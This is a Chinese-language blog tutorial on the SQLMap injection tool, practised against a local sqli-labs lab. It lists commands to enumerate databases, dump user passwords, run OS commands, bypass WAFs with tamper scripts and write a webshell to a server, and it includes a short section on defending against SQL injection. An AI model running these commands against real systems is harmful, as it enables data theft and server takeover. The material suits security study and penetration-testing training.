<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="SQLMAP◆使用SQLMap得出数据库信息的基本流程如下 :1.检查是否存在注入点：●sqlmap -u “http:&#x2F;&#x2F;192.168.198.128&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;1&quot; ●参数: -u #目标URL 2.查看所有数据库●sq|map -u “http:&#x2F;&#x2F;192.168.198.128&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2022/04/20/SQLMAP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="SQLMAP◆使用SQLMap得出数据库信息的基本流程如下 :1.检查是否存在注入点：●sqlmap -u “http:&#x2F;&#x2F;192.168.198.128&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;1&quot; ●参数: -u #目标URL 2.查看所有数据库●sq|map -u “http:&#x2F;&#x2F;192.168.198.128&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-04-20T08:21:01.376Z">
<meta property="article:modified_time" content="2022-04-20T08:21:01.535Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-SQLMAP" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2022/04/20/SQLMAP/" class="article-date">
  <time datetime="2022-04-20T08:21:01.376Z" itemprop="datePublished">2022-04-20</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="SQLMAP"><a href="#SQLMAP" class="headerlink" title="SQLMAP"></a>SQLMAP</h1><h2 id="◆使用SQLMap得出数据库信息的基本流程如下"><a href="#◆使用SQLMap得出数据库信息的基本流程如下" class="headerlink" title="◆使用SQLMap得出数据库信息的基本流程如下 :"></a>◆使用SQLMap得出数据库信息的基本流程如下 :</h2><h3 id="1-检查是否存在注入点："><a href="#1-检查是否存在注入点：" class="headerlink" title="1.检查是否存在注入点："></a>1.检查是否存在注入点：</h3><p>●sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;">http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;</a></p>
<p>●参数: -u #目标URL</p>
<h3 id="2-查看所有数据库"><a href="#2-查看所有数据库" class="headerlink" title="2.查看所有数据库"></a>2.查看所有数据库</h3><p>●sq|map -u “<a target="_blank" rel="noopener" href="http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;--dbs">http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;--dbs</a></p>
<p>●参数: -u #目标URL、–dbs #所有数据库</p>
<h3 id="3-查看当前使用的数据库"><a href="#3-查看当前使用的数据库" class="headerlink" title="3.查看当前使用的数据库"></a>3.查看当前使用的数据库</h3><p>●sqImap -u “<a target="_blank" rel="noopener" href="http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;">http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;</a> –current-db   –current-db #查看网站当前的数据库</p>
<p>●参数:-u #目标URL</p>
<span id="more"></span>

<h3 id="4-查看表名"><a href="#4-查看表名" class="headerlink" title="4.查看表名"></a>4.查看表名</h3><p>●sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;">http://192.168.198.128/sqli-labs-master/Less-1/?id=1&quot;</a> -D security –tables</p>
<p>●参数:-u #目标URL</p>
<p>​    -D #指定数据库</p>
<p>​    –tables #列出表名</p>
<h3 id="5-列出所有字段名"><a href="#5-列出所有字段名" class="headerlink" title="5.列出所有字段名"></a>5.列出所有字段名</h3><p>sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.198.128/sqli-labs-master/Less-">http://192.168.198.128/sqli-labs-master/Less-</a> 1/?id=1” -D security -T users –columns</p>
<p>●参数:-u #目标URL</p>
<p>​    -T #指定表名</p>
<p>​    – columns #列出所有的字段名</p>
<h3 id="6-列出字段内容-数据"><a href="#6-列出字段内容-数据" class="headerlink" title="6.列出字段内容 (数据)"></a>6.列出字段内容 (数据)</h3><p>sqlmap -U “<a target="_blank" rel="noopener" href="http://192.168.198.128/sqli-labs-master/Less">http://192.168.198.128/sqli-labs-master/Less</a> 1/?id=1” -D security -T users -C username，password –dump</p>
<p>●参数:-u #目标URL</p>
<p>​    -C #指定字段</p>
<p>​    – dump #列出字段内容,转存数据</p>
<h2 id="SQLmap的常用参数"><a href="#SQLmap的常用参数" class="headerlink" title="SQLmap的常用参数"></a>SQLmap的常用参数</h2><h3 id="◆输出级别参数-Output-verbosity"><a href="#◆输出级别参数-Output-verbosity" class="headerlink" title="◆输出级别参数( Output verbosity )"></a>◆输出级别参数( Output verbosity )</h3><p>➢参数:-V</p>
<p>➢使用方法: -v &lt;级别&gt;如: sqlmap -u [URL] -V 3</p>
<p>➢参数详情: SQLmap的输出信息按从简到繁，从0-6共分为7个级别,默认的输出级别为1。</p>
<p>➢各个输出级别的描述如下 :</p>
<p>0:只显示python的回溯、错误和关键信息</p>
<p>1 :显示信息和警告消息</p>
<p>2 :显示调式信息</p>
<p>3 :显示注入使用的攻击载荷</p>
<p>4 :显示HTTP请求</p>
<p>5 :显示HTTP响应头</p>
<p>6:显示HTTP相应页面的内容</p>
<h3 id="◆测试注入点权限"><a href="#◆测试注入点权限" class="headerlink" title="◆测试注入点权限"></a>◆测试注入点权限</h3><p>➢参数:–privileges</p>
<p>➢用法: sqImap -u [URL] –privileges //测试所有用户的权限</p>
<p>​             sqlmap -u [URL] –privileges -U sa //测试sa用户的权限</p>
<p>➢说明:当前用户有读取包含了数据库管理系统中用户信息的系统表的权限时使用这一参数可以列举数据库管理系统中用户的权限。通过用户权限可以判断哪些用户是管理员。</p>
<p>➢注意:若目标是MSSql数据库，这一参数会列出每个用户是否是管理员而不列出每个用户的具体权限。</p>
<h3 id="◆执行shell命令"><a href="#◆执行shell命令" class="headerlink" title="◆执行shell命令"></a>◆执行shell命令</h3><p>➢参数: -os-cmd / -os-shell</p>
<p>➢使用方法 : sqlmap -u [URL] – os-Cmd=”net user”//执行net user命令</p>
<p>​                      sqlmap -u [URL] – os-shell //系统交互式的shell</p>
<p>➢危害:用-os-shell命令可以模拟一个真实的shell ,可以使用INTO OUTFILE写进可写目录,创建一个web后门。</p>
<p>➢注意: 1、 需要有权限使用特定函数2、数据库为mysql、postgresql和sqlserver</p>
<h3 id="◆POST提交方式"><a href="#◆POST提交方式" class="headerlink" title="◆POST提交方式"></a>◆POST提交方式</h3><p>➢参数: 1.-data     //通过post方式提交参数</p>
<p>​              2.-r txt文件//读取文件中的HTTP数据包内容用来测试POST注入和HTTP Header注入</p>
<p>➢使用方法: sq|map -u [URL] –data “POST参数”</p>
<p>​                     sqIlmap -u [URL] -r “.txt文件”</p>
<h3 id="◆获取数据库的用户名和密码"><a href="#◆获取数据库的用户名和密码" class="headerlink" title="◆获取数据库的用户名和密码"></a>◆获取数据库的用户名和密码</h3><p>➢参数: 1.-users//枚举所有的用户</p>
<p>​              2.-passwords //枚举所有的用户密码</p>
<p>➢使用方法: sqlmap -u [URL] –users -passwords</p>
<h3 id="◆tamper参数"><a href="#◆tamper参数" class="headerlink" title="◆tamper参数"></a>◆tamper参数</h3><p>➢作用:</p>
<p>●tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf</p>
<p>●使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡，继而进行渗透攻击</p>
<p>➢用法:</p>
<p>●sqlmap -u [URL] –tamper=TAMPER利用给定的脚本进行篡改注入数据</p>
<p>●tamper的结构 :</p>
<pre><code>    #sqlmap/tamper/escapequotes.py
    from lib.core.enums import PRIORITY
    _priority_= PRIORITY.LOWEST
    def dependencies():
        ​    pass
    def tamper(payload, **kwargs):
        ​    return payload.replace(&quot;&#39;&quot;, &quot;\\&quot;).replace(&#39;&quot;&#39;,&#39;\\&quot;&#39;)
</code></pre>
<h2 id="SQLMap的深入理解"><a href="#SQLMap的深入理解" class="headerlink" title="SQLMap的深入理解"></a>SQLMap的深入理解</h2><h3 id="◆探测等级"><a href="#◆探测等级" class="headerlink" title="◆探测等级"></a>◆探测等级</h3><p>➢参数: –level</p>
<p>➢用法: sqlmap -u [URL] –level 3</p>
<p>➢说明 : SQLMap一共有5个探测等级，默认是1,SQLMap使用的Payload可以在xml/payloads.xml中看到，也可以根据相应的格式添加自己的payload.</p>
<p>level 1 :对GET和POST的数据进行测试</p>
<p>level 2 :会对HTTP cookie进行测试</p>
<p>level 3 :会对HTTP User-Agent/Referer头进行测试</p>
<p>level 4-5:测试的更加全面，同时测试的速度会更慢</p>
<p>➢注意: 在不确定哪个Payload或参数为注入点时,为了保证全面性,建议使用高的level值</p>
<h3 id="◆判断当前用户是否为管理员权限"><a href="#◆判断当前用户是否为管理员权限" class="headerlink" title="◆判断当前用户是否为管理员权限"></a>◆判断当前用户是否为管理员权限</h3><p>➢参数: –is-dba</p>
<p>➢用法: sqlmap -u [URL] –is-dba</p>
<p>➢说明:该命令用于查看当前账户是否为数据库管理员账户。这个命令有时候决定了你是否可以在服务器下进行写的操作，是否有写的权限,代表你是否可以在服务器上面写入一句话木马</p>
<p>➢结果:如果是管理员会返回Ture，否则返回False</p>
<h3 id="◆列出数据库管理员角色"><a href="#◆列出数据库管理员角色" class="headerlink" title="◆列出数据库管理员角色"></a>◆列出数据库管理员角色</h3><p>➢参数: –roles</p>
<p>➢用法: sqlmap -u [URL] –roles</p>
<p>➢说明 :该命令用于查看数据库用户角色,如果当前用户有去读取包含所有用户的表，输入该命令会列举出每个用户的角色，也可以用-U参数指定想看哪个用户的角色</p>
<h3 id="◆列举数据库管理系统信息"><a href="#◆列举数据库管理系统信息" class="headerlink" title="◆列举数据库管理系统信息"></a>◆列举数据库管理系统信息</h3><p>➢参数: -b或-banner</p>
<p>➢用法: sqImap -u [URL] –banner</p>
<p>➢说明 :返回数据库管理系统的版本号和最后的补丁级别以及底层的操作系统信息。</p>
<p>➢结果:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[11:36:11] [INFO] fetching banner</span><br><span class="line">web server operating system: Windows</span><br><span class="line">web application technology: PHP 5.4.45. Apache 2.4.23</span><br><span class="line">back-end DBMS: MySQL &gt;= 5.0</span><br><span class="line">banner :&quot;5.5.53 &quot;</span><br></pre></td></tr></table></figure>



<h2 id="SQLMap的HTTP头部注入"><a href="#SQLMap的HTTP头部注入" class="headerlink" title="SQLMap的HTTP头部注入"></a>SQLMap的HTTP头部注入</h2><h3 id="◆HTTP方法"><a href="#◆HTTP方法" class="headerlink" title="◆HTTP方法"></a>◆HTTP方法</h3><p>➢参数: -method</p>
<p>➢用法: sqlmap -u [URL] -method “PUT”</p>
<p>➢说明: 一般来说，Sqlmap能自动判断出是使用GET方法还是POST方法,但在某些情况下需要的可能是PUT等很少见的方法,此时就需要用参数”-method”来指定方法。</p>
<h3 id="◆cookie注入"><a href="#◆cookie注入" class="headerlink" title="◆cookie注入"></a>◆cookie注入</h3><p>➢参数: –cookie</p>
<p>➢用法: sqlmap -u [url] –cookie=”SESSIONIDxxxx;NAME=ichunqiu;” –level 2 –data””</p>
<p>➢说明:当需要对cookie注入的时候,必须使用–cookie选项,–data””因为post的数据长度为0 ,但是又想使用post方法进行注入，则使用–data””,使用–data选项后，sqlmap自动使用post方法。</p>
<p>➢注意: 1、sqlmap不支持使用–method指定http请求的方法。</p>
<p>2、默认不扫cookie的内容，必须是level大于等于2才能扫cookie里的内容</p>
<p>3、cookie默认的分隔符为”;”</p>
<h3 id="◆User-Agent注入"><a href="#◆User-Agent注入" class="headerlink" title="◆User-Agent注入"></a>◆User-Agent注入</h3><p>➢参数: -user-agent和-random-agent</p>
<p>➢用法: –user-agent= “Mozilla/5.0 (Windows NT 6.1; WoW64; rv:16.0) Gecko/20100101 Firefox/16.0”</p>
<p>➢说明:”-user-agent”可以指定一 个User-Agent值。 参数”-random- agent” ，Sqlmap会从文件./txt/user-agents.txt中随机地取一个User-Agent</p>
<p>➢注意:1、在一次会话中只有使用同一个User-Agent ,并不是每发一个HTTP请求包,都随机一个User-Agent。</p>
<p>​            2、必须是level大于等于3才会尝试对referer注入。</p>
<h3 id="◆Referer注入"><a href="#◆Referer注入" class="headerlink" title="◆Referer注入"></a>◆Referer注入</h3><p>➢参数: -referer</p>
<p>➢用法: -referer=”aaa”</p>
<p>➢说明:使qlmap可以在请求中伪造HTTP中的referer, Sqlmap发送的HTTP请求头部默认无Referer字段。</p>
<p>➢注意:必须是level大于等于3才会尝试对referer注入。</p>
<h2 id="SQLMap执行SQL语句"><a href="#SQLMap执行SQL语句" class="headerlink" title="SQLMap执行SQL语句"></a>SQLMap执行SQL语句</h2><h3 id="◆执行文件中的SQL语句"><a href="#◆执行文件中的SQL语句" class="headerlink" title="◆执行文件中的SQL语句"></a>◆执行文件中的SQL语句</h3><p>➢参数: –sgl-file</p>
<p>➢用法: sqlmap -u [URL] –sqL-file=sql文件</p>
<p>➢说明:参数可以直接执行SQL文件中的语句。</p>
<p>➢举例:新建一个SQL文件,如: 1.sql</p>
<p>内容为: select version();select @@datadir;</p>
<p>在sqlmap工具中输入sqlmap -u [url] –sql-file=1.sql</p>
<p>如上,MySQL的版本、MySQL 数据库存放的路径都被查询到</p>
<h2 id="SQLMap的文件操作"><a href="#SQLMap的文件操作" class="headerlink" title="SQLMap的文件操作"></a>SQLMap的文件操作</h2><h3 id="◆了解SQL注入可以进行文件读写操作带来的危害"><a href="#◆了解SQL注入可以进行文件读写操作带来的危害" class="headerlink" title="◆了解SQL注入可以进行文件读写操作带来的危害"></a>◆了解SQL注入可以进行文件读写操作带来的危害</h3><p>➢如果当前web页面存在SQL注入漏洞,且当前的用户是root权限,且可以进行文件读写操作</p>
<p>➢我们可以在知道绝对路径的情况下,尝试上传一个句话木马，并用菜刀连接后,获取到网站的getshell</p>
<h3 id="◆SQL注入导致的文件读写的防御方法"><a href="#◆SQL注入导致的文件读写的防御方法" class="headerlink" title="◆SQL注入导致的文件读写的防御方法"></a>◆SQL注入导致的文件读写的防御方法</h3><p>1.将secure- file-priv的参数在my.ini中配置为secure-file- priv= null将会限制mysqld不允许导入导出操作</p>
<p>​    secure-file- priv的配置,可以通过语句: select @@secure_file_priv 查询</p>
<p>2.在用户输入可控参数时,对敏感语句进行过滤</p>
<h3 id="◆上传文件"><a href="#◆上传文件" class="headerlink" title="◆上传文件"></a>◆上传文件</h3><p>●参数: –file-write –file-dest</p>
<p>用法: sqlmap -u [URL] –file-write“写入本地文件的地址” –file-dest “要写入的文件绝对路径”</p>
<p>●说明:该命令用于写入本地文件到服务器中，上传的文件可以是文本，也可以是二进制文件</p>
<p>●原理:利用mysq|的into outfile函数如: union select 1,2, ‘aaa’ into outfile ‘C:\phpstudy_ pro\www\test1.txt’</p>
<p>●条件:</p>
<p>1.文件必须在服务器上</p>
<p>2.已知绝对路径</p>
<p>3.有写文件权限( secure-file- priv是否被禁用，是否有目录权限等等)</p>
<p>4.必须能绕过单引号过滤</p>
<p>5.具有特定的函数执行特权, 一般要求root</p>
<p>6.数据库为mysql、postgresql和sqlserver</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/04/20/SQLMAP/" data-id="cl27devj20000n0u2ax1l3qjj" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/04/20/%E7%BB%95%E8%BF%87waf%E6%8A%80%E5%B7%A7/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2022/03/24/3.22/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/04/21/XSS%E6%BC%8F%E6%B4%9E/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/04/21/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/04/20/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/04/20/%E7%BB%95%E8%BF%87waf%E6%8A%80%E5%B7%A7/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/04/20/SQLMAP/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>